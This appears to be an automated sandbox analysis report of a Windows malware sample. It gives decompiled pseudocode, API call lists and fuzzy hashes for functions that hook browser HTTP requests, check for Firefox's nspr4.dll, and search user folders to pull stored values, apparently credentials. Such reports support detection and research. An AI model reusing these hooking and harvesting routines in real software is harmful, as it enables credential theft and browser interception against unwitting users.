    • HeapFree.KERNEL32(?,00000000,?), ref: 0042271A
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
      • Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
      • Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
      • Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844
    • HeapFree.KERNEL32(?,00000000,?), ref: 00422737
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineFreeHeap$FileFindFirstFolderMatchObjectSingleSpecWait
    • String ID: #$&
    • API String ID: 1191416533-3870246384
    • Opcode ID: b1384ef16326ac4f335d7948c6ade10623f007c846c448b719b30173d7b99bbd
    • Instruction ID: 1feac3dd11a70a099613fb7fc16dc8a34dfdbd0b83bbb61d95b109450f73998d
    • Opcode Fuzzy Hash: b1384ef16326ac4f335d7948c6ade10623f007c846c448b719b30173d7b99bbd
    • Instruction Fuzzy Hash: FD21C475704310ABE324DB15ED45FABB7A8EBC4704F80452DFA44AB2D0D7B8D905CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00421AD0(void* __eflags) {
    				char _v680;
    				char _v1180;
    				char _v1200;
    				char _v1204;
    				intOrPtr _v1208;
    				intOrPtr _v1212;
    				intOrPtr _v1216;
    				intOrPtr _v1220;
    				char _v1228;
    				char _v1240;
    				intOrPtr _v1244;
    				void* _v1248;
    				void* __esi;
    				void* _t22;
    				intOrPtr* _t39;
    				void* _t40;
    				char* _t41;
    				signed int _t42;
    				void* _t44;
    
    				_t44 =  &_v1228;
    				_t41 =  &_v1204;
    				E00424100(0x81, _t41);
    				_v1216 = 0x26;
    				_v1212 = 0x1a;
    				_v1208 = 0x23;
    				_v1220 = _t41;
    				E00410870(_t41,  &_v1228, 0, 8);
    				_t39 = __imp__SHGetFolderPathW;
    				_t42 = 0;
    				do {
    					_push( &_v1180);
    					_push(0);
    					_push(0);
    					_push( *((intOrPtr*)(_t44 + 0x14 + _t42 * 4)));
    					_push(0);
    					if( *_t39() == 0) {
    						E00418700( &_v1200,  &_v1240, 1, 2, E00421750,  &_v1248, _t21, _t21, _t21);
    					}
    					_t42 = _t42 + 1;
    				} while (_t42 < 3);
    				_t22 = _v1248;
    				if(_v1244 <= 0) {
    					if(_t22 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t22);
    					}
    					goto L11;
    				} else {
    					_t40 = _t22;
    					if(_t22 == 0) {
    						L11:
    						return _t22;
    					} else {
    						if( *_t22 != 0) {
    							E00424100(0x82,  &_v680);
    							E0040D880(_t40, 0xcb,  &_v680);
    						}
    						return HeapFree( *0x42e6d4, 0, _t40);
    					}
    				}
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00421B30
    • HeapFree.KERNEL32(?,00000000,?), ref: 00421B9A
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0040365E,?,00000000), ref: 0041873C
      • Part of subcall function 00418700: FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 00418757
      • Part of subcall function 00418700: WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 00418777
      • Part of subcall function 00418700: PathMatchSpecW.SHLWAPI(?), ref: 004187DD
      • Part of subcall function 00418700: PathCombineW.SHLWAPI(?,?,0000002C), ref: 00418844
    • HeapFree.KERNEL32(?,00000000,?), ref: 00421BB7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineFreeHeap$FileFindFirstFolderMatchObjectSingleSpecWait
    • String ID: #$&
    • API String ID: 1191416533-3870246384
    • Opcode ID: a3ec9968f02915fe9fde2a501de06d4b18fa56ca2b2c83deb9ef46f7f8097ebd
    • Instruction ID: 32a645155c7d5c0fb8d6a9607b7cbcede0a2e1a20dd084966ebf6fc0228dc7ff
    • Opcode Fuzzy Hash: a3ec9968f02915fe9fde2a501de06d4b18fa56ca2b2c83deb9ef46f7f8097ebd
    • Instruction Fuzzy Hash: 452108717003106BE310DB11EC45FAB77A8EBC4704F80452DFA44AB2D0E778E909CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040BF60(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
    				char _v20;
    				char _v24;
    				char* _v36;
    				long _v44;
    				long _v48;
    				long _v52;
    				intOrPtr _v56;
    				long _t17;
    				struct _GOPHER_FIND_DATAA _t18;
    				int _t19;
    				char* _t22;
    				long _t26;
    				void* _t33;
    
    				_t17 = WaitForSingleObject( *0x42edbc, 0);
    				_t33 = _a4;
    				_t18 = _a8;
    				if(_t17 == 0) {
    					L8:
    					_t19 = HttpSendRequestExA(_t33, _t18, _a12, _a16, _a20);
    					L9:
    					return _t19;
    				}
    				_push(0x28);
    				if(_t18 != 0) {
    					_push(_t18);
    					_push( &_v44);
    					E00410820();
    					_t26 = _v44;
    					if(_t26 != 0) {
    						_t22 = _v36;
    						if(_t22 != 0) {
    							HttpAddRequestHeadersA(_t33, _t22, _t26, 0xa0000000);
    							_v52 = 0;
    							_v48 = 0;
    						}
    					}
    				} else {
    					_push(_t18);
    					_push( &_v44);
    					E00410870(_t18);
    					_v56 = 0x28;
    				}
    				_t19 = E0040BB80(_t33,  &_v24,  &_v20);
    				if(_t19 != 0xffffffff) {
    					goto L9;
    				} else {
    					_t18 =  &_v44;
    					goto L8;
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF72
    • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0040BFC0
    • HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0040BFFD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HttpRequest$HeadersObjectSendSingleWait
    • String ID: ($0h`p
    • API String ID: 2328130936-3983267742
    • Opcode ID: 843c1a46c425855ddf07cbe9c5f777521da0f14382ec25b43a3526682b81fb1b
    • Instruction ID: 79b4c6d88892c6e39760786b6d84f2bf3a4c42c28baf4107dc6821c9ca581c01
    • Opcode Fuzzy Hash: 843c1a46c425855ddf07cbe9c5f777521da0f14382ec25b43a3526682b81fb1b
    • Instruction Fuzzy Hash: C8115E71204306ABD310DF25DC85FBB77ACEB84714F044A2EF855E3290EB74E9058BAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0041A060(intOrPtr _a4, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t10;
    				int _t13;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t17;
    				void* _t20;
    				intOrPtr _t21;
    				void* _t24;
    				intOrPtr* _t25;
    				intOrPtr _t27;
    				void* _t28;
    
    				if(WaitForSingleObject( *0x42edbc, 0) != 0) {
    					_t16 = _a4;
    					_t25 = _a16;
    					_t21 = _a12;
    					_t10 =  *0x42e92c(_t16, 0, _t21, _t25, _t20, _t24, _t28, _t15);
    					_t19 = _v8;
    					_t17 =  *0x42e928(_t16, _v8, _t21, _t25);
    					if(_t10 < 0 && _t17 >= 0 && _t25 != 0 &&  *_t25 != 0 && _t21 != 0) {
    						EnterCriticalSection(0x42e6e8);
    						if(( *0x42e700 & 0x00000001) == 0) {
    							_t27 =  *_t25;
    							_t13 = lstrcmpiW( *(_t21 + 4), L"nspr4.dll");
    							_t38 = _t13;
    							if(_t13 == 0 && E0041E890(_t19, _t27, _t38) != 0) {
    								 *0x42e700 =  *0x42e700 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x42e6e8);
    					}
    					return _t17;
    				}
    				goto ( *0x42e928);
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041A068
    • EnterCriticalSection.KERNEL32(0042E6E8), ref: 0041A0BF
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 0041A0D9
    • LeaveCriticalSection.KERNEL32(0042E6E8), ref: 0041A0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
    • String ID: nspr4.dll
    • API String ID: 3081114022-741017701
    • Opcode ID: 9eb92bac7d7fb09698e0d5e2e7196b6af4cf2bb62582e77341cb89d1357d6971
    • Instruction ID: e8748a0f8acbad1f1e6bb595dc2e14c2e7af7eac45cd56e6bb82066a0d17b08b
    • Opcode Fuzzy Hash: 9eb92bac7d7fb09698e0d5e2e7196b6af4cf2bb62582e77341cb89d1357d6971
    • Instruction Fuzzy Hash: 18119471302311ABD7205F969D48B977FA8AB9DB11F44442AF900B3260D7B8ACD2CA5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E004266C0() {
    				char _v672;
    				char _v800;
    				char _v904;
    				void _v1008;
    				long _v1012;
    				void* __esi;
    				void* _t12;
    				void* _t18;
    				void* _t20;
    				signed char _t26;
    				signed char _t29;
    				void* _t32;
    
    				_t12 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t12 == 0) {
    					L11:
    					return _t12;
    				} else {
    					_t12 = GetUserObjectInformationW(_t12, 2,  &_v1008, 0x64,  &_v1012);
    					if(_t12 == 0 || _v1012 != 0x4e) {
    						goto L11;
    					} else {
    						E0041D150( &_v800);
    						E00416E10(0x42eb70,  &_v672,  *0x42e904,  &_v904, 0);
    						_t18 = 0;
    						while(1) {
    							_t26 =  *((intOrPtr*)(_t32 + _t18 + 0xc));
    							_t29 =  *((intOrPtr*)(_t32 + _t18 + 0x74));
    							if(_t26 != _t29) {
    								break;
    							}
    							_t18 = _t18 + 1;
    							if(_t18 < 0x4c) {
    								continue;
    							} else {
    								L8:
    								_t20 = E00426210(0x42eea0, 0);
    								if(_t20 == 0) {
    									return E004264F0(0x42eea0, 0);
    								}
    								 *0x42e8f8 =  *0x42e8f8 | 0x00000004;
    								return _t20;
    							}
    							goto L12;
    						}
    						_t12 = (_t26 & 0x000000ff) - (_t29 & 0x000000ff);
    						if(_t12 != 0) {
    							goto L11;
    						} else {
    							goto L8;
    						}
    					}
    				}
    				L12:
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 004266C7
    • GetThreadDesktop.USER32(00000000), ref: 004266CE
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 004266EB
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CurrentDesktopFromInformationObjectStringUser
    • String ID: N$pB
    • API String ID: 2495445222-1695575743
    • Opcode ID: c85de0a76ab5d99099db71cbaed297c0f3378f169a33a90399c68f9b908525ac
    • Instruction ID: e153c85d36fc57acf6613cf7f3524645a274186946a0968ad3724a787040b431
    • Opcode Fuzzy Hash: c85de0a76ab5d99099db71cbaed297c0f3378f169a33a90399c68f9b908525ac
    • Instruction Fuzzy Hash: D01136307403215BE720EB65B995BF737AA9BC0308FD1887BF59187290DB3CD808C69A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412FC0(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t9;
    				char* _t17;
    				void* _t21;
    				void* _t24;
    
    				_t17 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t17 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;)";
    				}
    				_t21 = InternetOpenA(_t17,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t21 == 0) {
    					L7:
    					_t9 = 0;
    				} else {
    					_t24 = 0;
    					do {
    						_t1 = _t24 + 0x42d390; // 0x2
    						_t2 = _t24 + 0x42d394; // 0x42d394
    						InternetSetOptionA(_t21,  *_t1, _t2, 4);
    						_t24 = _t24 + 8;
    					} while (_t24 < 0x18);
    					_t9 = InternetConnectA(_t21, _v32, _v28, 0, 0, 3, 0, 0);
    					if(_t9 == 0) {
    						InternetCloseHandle(_t21);
    						goto L7;
    					}
    				}
    				return _t9;
    			}

    APIs
    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00412FD7
    • InternetSetOptionA.WININET(00000000,00000002,0042D394,00000004), ref: 00413001
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00413020
    • InternetCloseHandle.WININET(00000000), ref: 0041302D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;)
    • API String ID: 910987326-3709307374
    • Opcode ID: a1f5871c53d99c0e01fc0476ecddd2cae4b2914766c24f5c4f72077345cf7842
    • Instruction ID: 8b7527cf8cbf7132b288a927cf5b3a63cfecc6b06cb693c38af1da8f2a651d01
    • Opcode Fuzzy Hash: a1f5871c53d99c0e01fc0476ecddd2cae4b2914766c24f5c4f72077345cf7842
    • Instruction Fuzzy Hash: 1B0181723403017BF624CB55DEC5FB762ADEB98B01F10042DFA05EA2E4D674AD05876D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0041E2D0(intOrPtr _a4) {
    				signed int _t7;
    				intOrPtr _t8;
    				intOrPtr _t9;
    				intOrPtr* _t11;
    				intOrPtr* _t13;
    				intOrPtr _t16;
    
    				_t7 = WaitForSingleObject( *0x42edbc, 0);
    				_t8 = _a4;
    				if(_t7 == 0) {
    					L11:
    					__imp__#3(_t8);
    					return _t7;
    				}
    				EnterCriticalSection(0x42edc4);
    				_t16 =  *0x42e7ec;
    				_t7 = 0;
    				if(_t16 == 0) {
    					L10:
    					LeaveCriticalSection(0x42edc4);
    					goto L11;
    				}
    				_t13 =  *0x42e71c;
    				_t11 = _t13;
    				while(1) {
    					_t9 =  *_t11;
    					if(_t9 == _t8 && _t9 != 0xffffffff) {
    						break;
    					}
    					_t7 = _t7 + 1;
    					_t11 = _t11 + 0xc;
    					if(_t7 < _t16) {
    						continue;
    					}
    					L9:
    					goto L10;
    				}
    				_t7 = _t13 + (_t7 + _t7 * 2) * 4;
    				if(_t7 != 0) {
    					_t7 = E0041DF50(_t7, 0);
    				}
    				goto L9;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041E2D9
    • EnterCriticalSection.KERNEL32(0042EDC4), ref: 0041E2ED
    • LeaveCriticalSection.KERNEL32(0042EDC4), ref: 0041E334
    • closesocket.WS2_32(?), ref: 0041E33C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeaveObjectSingleWaitclosesocket
    • String ID: p0u
    • API String ID: 903583691-1742372003
    • Opcode ID: d14a640a464fe9e183d54301400fc14b0462c6b6705cdd6f1014f4c40462f23e
    • Instruction ID: d8b08d56f72e8285ae4c8f4c3b7fd6e1f7a015e8aca15063f9719fa574978dde
    • Opcode Fuzzy Hash: d14a640a464fe9e183d54301400fc14b0462c6b6705cdd6f1014f4c40462f23e
    • Instruction Fuzzy Hash: CD0186357002169BC7205B27DC88AD77759EF95760B94052BFD16E72E0DB34A882C52D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00421750(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
    				short _v524;
    				char _v532;
    				char _v596;
    				char _v628;
    				char _v640;
    				char _v644;
    				signed int _v652;
    				char _v664;
    				char _v684;
    				char _v688;
    				char _v692;
    				intOrPtr* _v696;
    				char _v700;
    				char _v704;
    				intOrPtr* _v708;
    				signed int _v712;
    				char _v716;
    				signed int _v720;
    				intOrPtr* _v724;
    				signed int _v728;
    				char _v736;
    				char _v740;
    				signed int _v744;
    				signed int _v748;
    				signed int _v752;
    				signed int _v756;
    				void* _v760;
    				signed int _v764;
    				signed int _v768;
    				intOrPtr* _v772;
    				char _v776;
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t87;
    				signed int _t89;
    				signed int _t95;
    				intOrPtr* _t98;
    				signed int _t99;
    				intOrPtr* _t100;
    				intOrPtr* _t103;
    				signed int _t105;
    				intOrPtr* _t107;
    				signed int _t109;
    				intOrPtr* _t111;
    				signed int _t113;
    				intOrPtr* _t115;
    				signed int _t117;
    				signed int _t118;
    				signed int _t119;
    				intOrPtr* _t120;
    				intOrPtr* _t122;
    				signed int _t124;
    				signed int _t132;
    				signed int _t136;
    				intOrPtr* _t138;
    				signed int _t140;
    				signed int _t142;
    				signed int _t144;
    				intOrPtr* _t146;
    				signed int _t148;
    				intOrPtr* _t151;
    				signed int _t153;
    				signed int _t161;
    				signed int _t162;
    				void* _t163;
    				intOrPtr _t164;
    				WCHAR* _t166;
    				signed int _t223;
    				signed int _t225;
    				signed char* _t229;
    				char* _t231;
    				char* _t232;
    				char* _t233;
    				char* _t234;
    				char* _t235;
    				intOrPtr* _t236;
    				intOrPtr _t238;
    				intOrPtr* _t239;
    				signed int _t240;
    				intOrPtr* _t241;
    				intOrPtr* _t242;
    				char* _t243;
    				signed int _t245;
    				void* _t247;
    
    				_t166 = __ecx;
    				_t247 = (_t245 & 0xfffffff8) - 0x2b4;
    				_t229 = __edx;
    				_t87 = __edx + 0x2c;
    				_t225 = 0;
    				if(_t87 != 0) {
    					while(1) {
    						_t223 =  *_t87 & 0x0000ffff;
    						if(_t223 != 0x5c && _t223 != 0x2f) {
    							goto L5;
    						}
    						_t87 =  &(_t87[1]);
    					}
    				}
    				L5:
    				_t89 = PathCombineW( &_v524, _t166, _t87);
    				__eflags = _t89;
    				if(_t89 == 0) {
    					L58:
    					return 1;
    				} else {
    					__eflags =  *_t229 & 0x00000010;
    					if(( *_t229 & 0x00000010) == 0) {
    						_push( &_v532);
    						_t161 = E00419940();
    						_v652 = _t161;
    						__eflags = _t161 - _t225;
    						if(_t161 != _t225) {
    							_t231 =  &_v596;
    							E00424100(0x7c, _t231);
    							_t95 =  *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x90))))(_t161, _t231,  &_v688);
    							__eflags = _t95;
    							if(_t95 == 0) {
    								_t98 = _v700;
    								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0x24))))(_t98,  &_v716);
    								__eflags = _t99;
    								if(_t99 == 0) {
    									while(1) {
    										_t232 =  &_v628;
    										E00424100(0x7d, _t232);
    										_t103 = _v724;
    										_t105 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 0x94))))(_t103, _t232,  &_v684);
    										__eflags = _t105;
    										if(_t105 != 0) {
    											_v728 = _t225;
    										} else {
    											_t151 = _v696;
    											_t242 = _t151;
    											_t153 =  *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x68))))(_t151,  &_v704);
    											__eflags = _t153;
    											if(_t153 != 0) {
    												_v712 = _t225;
    											}
    											 *((intOrPtr*)( *((intOrPtr*)( *_t242 + 8))))(_t242);
    											_v740 = _v716;
    										}
    										_t233 =  &_v664;
    										E00424100(0x7e, _t233);
    										_t107 = _v736;
    										_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x94))))(_t107, _t233,  &_v684);
    										__eflags = _t109;
    										if(_t109 != 0) {
    											_v728 = _t225;
    										} else {
    											_t146 = _v696;
    											_t241 = _t146;
    											_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x68))))(_t146,  &_v712);
    											__eflags = _t148;
    											if(_t148 != 0) {
    												_v720 = _t225;
    											}
    											 *((intOrPtr*)( *((intOrPtr*)( *_t241 + 8))))(_t241);
    											_v740 = _v724;
    										}
    										_t234 =  &_v664;
    										E00424100(0x7f, _t234);
    										_t111 = _v748;
    										_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x94))))(_t111, _t234,  &_v700);
    										__eflags = _t113;
    										if(_t113 != 0) {
    											_v756 = _t225;
    											_t162 = _t225;
    										} else {
    											_t142 = _v712;
    											_t240 = _t142;
    											_t144 =  *((intOrPtr*)( *((intOrPtr*)( *_t142 + 0x68))))(_t142,  &_v736);
    											__eflags = _t144;
    											if(_t144 != 0) {
    												_v744 = _t225;
    											}
    											 *((intOrPtr*)( *((intOrPtr*)( *_t240 + 8))))(_t240);
    											_t162 = _v748;
    											_v768 = _t162;
    										}
    										_t235 =  &_v700;
    										E00424100(0x80, _t235);
    										_t115 = _v760;
    										_t117 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x94))))(_t115, _t235,  &_v716);
    										__eflags = _t117;
    										if(_t117 == 0) {
    											_t138 = _v728;
    											_t239 = _t138;
    											_t140 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x68))))(_t138,  &_v744);
    											__eflags = _t140;
    											if(_t140 != 0) {
    												_v752 = _t225;
    											}
    											 *((intOrPtr*)( *((intOrPtr*)( *_t239 + 8))))(_t239);
    											_t225 = _v756;
    										}
    										_t118 = _v764;
    										__eflags = _t118;
    										if(_t118 == 0) {
    											goto L47;
    										}
    										__eflags =  *_t118;
    										if( *_t118 != 0) {
    											__eflags = _t162;
    											if(_t162 != 0) {
    												__eflags =  *_t162;
    												if( *_t162 != 0) {
    													__eflags = _t225;
    													if(_t225 != 0) {
    														__eflags =  *_t225;
    														if( *_t225 != 0) {
    															_t211 = _v752;
    															__eflags = _v752;
    															if(_v752 == 0) {
    																L41:
    																_t163 = 0x15;
    															} else {
    																_t163 = E00411140(_t211);
    																__eflags = _t163 - 1;
    																if(_t163 < 1) {
    																	goto L41;
    																} else {
    																	__eflags = _t163 - 0xffff;
    																	if(_t163 > 0xffff) {
    																		goto L41;
    																	}
    																}
    															}
    															_v760 = 0;
    															E00424100(0x55,  &_v640);
    															_push(_t163);
    															_push(_v764);
    															_push(_t225);
    															_t132 = E00411DC0(__eflags,  &_v760,  &_v640, _v768);
    															_t164 = _v760;
    															_t247 = _t247 + 0x18;
    															__eflags = _t132;
    															if(_t132 > 0) {
    																_t238 = _a4;
    																_t136 = E00410D70(_t238, _t164, _t132);
    																__eflags = _t136;
    																if(_t136 != 0) {
    																	_t73 = _t238 + 4;
    																	 *_t73 =  *(_t238 + 4) + 1;
    																	__eflags =  *_t73;
    																}
    															}
    															E004107C0(_t164);
    															_t162 = _v768;
    															_t118 = _v764;
    														}
    													}
    												}
    											}
    										}
    										_t236 = __imp__#6;
    										 *_t236(_t118);
    										L48:
    										_t119 = _v752;
    										__eflags = _t119;
    										if(_t119 != 0) {
    											 *_t236(_t119);
    										}
    										__eflags = _t162;
    										if(_t162 != 0) {
    											 *_t236(_t162);
    										}
    										__eflags = _t225;
    										if(_t225 != 0) {
    											 *_t236(_t225);
    										}
    										_t120 = _v772;
    										 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 8))))(_t120);
    										_t122 = _v760;
    										_t124 =  *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x24))))(_t122,  &_v776);
    										__eflags = _t124;
    										if(_t124 == 0) {
    											_t225 = 0;
    											__eflags = 0;
    											continue;
    										}
    										_t161 = _v728;
    										goto L56;
    										L47:
    										_t236 = __imp__#6;
    										goto L48;
    									}
    								}
    								L56:
    								_t100 = _v708;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
    							}
    							 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
    						}
    						goto L58;
    					} else {
    						_t243 =  &_v644;
    						E00424100(0x7b, _t243);
    						_v692 = _t243;
    						E00418700( &_v532,  &_v692, 1, 5, E00421750, _a4, _t225, _t225, _t225);
    						return 1;
    					}
    				}
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 0042178C
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CombinePath
    • String ID:
    • API String ID: 3422762182-0
    • Opcode ID: 4f659e9d74a8e5f42ed1a3e15ba5fa8383fa70de8cefdbbb13b929be5a74d9e8
    • Instruction ID: 5c1201b568dfa04a20a1807ef3c8fcaa5e4e558a5cfccd2aadc076cfd87f2839
    • Opcode Fuzzy Hash: 4f659e9d74a8e5f42ed1a3e15ba5fa8383fa70de8cefdbbb13b929be5a74d9e8
    • Instruction Fuzzy Hash: 4BB157757042119FC710DB69D880A6BB3E9EFD8304F54891EF98997360DB38ED42CBA6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,?,?,00000102,?,?,00000010,?,?,00000078), ref: 0040FD25
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FD6D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000104,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDAD
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FDEA
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,0000000A,?,000001E6,?,0042EB80,000001E6,?,?,00000102,?), ref: 0040FE2A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWide
    • String ID:
    • API String ID: 626452242-0
    • Opcode ID: cba5dde8d7e7c38459aa2db976023370e303a9a9eb8d04d11a0f8009feebcacd
    • Instruction ID: fdc7fe26f0b2c3ef3c28b8353ec72131834ca94e36f985c7aba88bf6d749c283
    • Opcode Fuzzy Hash: cba5dde8d7e7c38459aa2db976023370e303a9a9eb8d04d11a0f8009feebcacd
    • Instruction Fuzzy Hash: B89136716093807AD335DB20CC45BEBB7A5EF41704F04493EE68AEB5C2D674B248C799
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0040FC20(intOrPtr* __edi, void* __ebp, void* __eflags) {
    				char _v668;
    				char _v796;
    				char _v1056;
    				char _v1076;
    				char _v1080;
    				char _v1086;
    				intOrPtr _v1094;
    				char _v1096;
    				char _v1106;
    				char _v1126;
    				char _v1146;
    				intOrPtr _v1214;
    				char _v1460;
    				char _v1464;
    				char _v1544;
    				char _v1556;
    				char _v1572;
    				void* __esi;
    				int _t76;
    				signed int _t77;
    				int _t78;
    				signed int _t79;
    				int _t80;
    				signed int _t81;
    				int _t82;
    				signed int _t83;
    				int _t84;
    				signed int _t85;
    				int _t86;
    				signed int _t87;
    				intOrPtr* _t109;
    				short* _t112;
    				short* _t113;
    				short* _t114;
    				short* _t115;
    				short* _t116;
    				short* _t117;
    				void* _t118;
    				void* _t121;
    
    				_t118 = __ebp;
    				_t109 = __edi;
    				_t121 =  &_v1544;
    				E0041D150( &_v796);
